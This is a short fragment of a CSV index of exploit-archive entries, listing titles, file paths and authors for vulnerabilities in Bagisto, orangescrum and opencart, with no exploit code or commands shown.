50548,exploits/multiple/webapps/50548.txt,"Bagisto 1.3.3 - Client-Side Template Injection",1970-01-01,"Mohamed Abdellatif Jaber",webapps,multiple, 50548,exploits/multiple/webapps/50548.txt,"Bagisto 1.3.3 - Client-Side Template Injection",1970-01-01,"Mohamed Abdellatif Jaber",webapps,multiple,
50551,exploits/multiple/webapps/50551.txt,"orangescrum 1.8.0 - Privilege escalation (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
50553,exploits/multiple/webapps/50553.txt,"orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,

Can't render this file because it is too large.